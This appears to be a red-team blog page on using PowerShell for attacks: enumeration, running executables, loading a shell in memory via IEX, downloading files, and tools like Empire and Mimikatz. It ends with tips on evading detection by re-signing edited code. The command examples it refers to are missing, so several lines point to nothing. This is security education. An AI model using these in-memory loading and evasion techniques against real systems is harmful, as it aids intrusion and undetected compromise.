PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.

Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be user to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. PowerShell may also be used to download and run executables from the internet, which can be executed from disk or in memory without touching the disk. [More on this later].

Administrator permissions are required to use PowerShell to connect to remote systems.

A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, and PSAttack.

PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI)

Some of the following tool's are well know for using PowerShell such as Empire, PowerSploit, PSAttack, Cobalt Strike, Mimikatz, BloodHound, Unicorn etc.

So as we can see PowerShell is a great offensive tool (and Defensive) which can help us in various form's of attacks and it just doesn't stop there, it also can be run in memory! (here).

Possibilities here are almost endless. Can we enumerate?. These commands can also be used on CMD as well but with Powershell we can have more Information and even only ask for certain info that we are interested.

What about execute? Just typing in the executable should be enough as Powershell's ENV has calc in it's path.

What Processes are running? Who owns it?

Let's call a shell in memory, It will run as soon as it grabs t form the server without saving this onto the Disk. IEX = Invoke-Expression

Can we short this down? Of course let's add all his into a variable since PowerShell is a scripting language you can also create variables for this long line and add them together.

Can we go even shorter?

And Yes!

Let's try downloading a file

Other Frameworks also work with PowerShell, Empire holds more than 200 modules in Powershell

As PowerShell itself is an entire subject here was a couple demonstrations on how PowerShell can be incredibly useful for Red Teams as for Blue Teams on this time of writing even though powershell has a lot to offer it is dying in real world engagements because of how monitored this is. Some ways to move on can be learning the .NET Framework, C#,C++ also to be quick and dirty you can edit old code and create a new signature on the executed file, but remember it might not get caught on foothold, but it can be on post-exploitation since it is still calling or creating processes, that are odd enough to get noticed. An incredible list of commands for CMD and there respective PowerShell commands here.

Last updated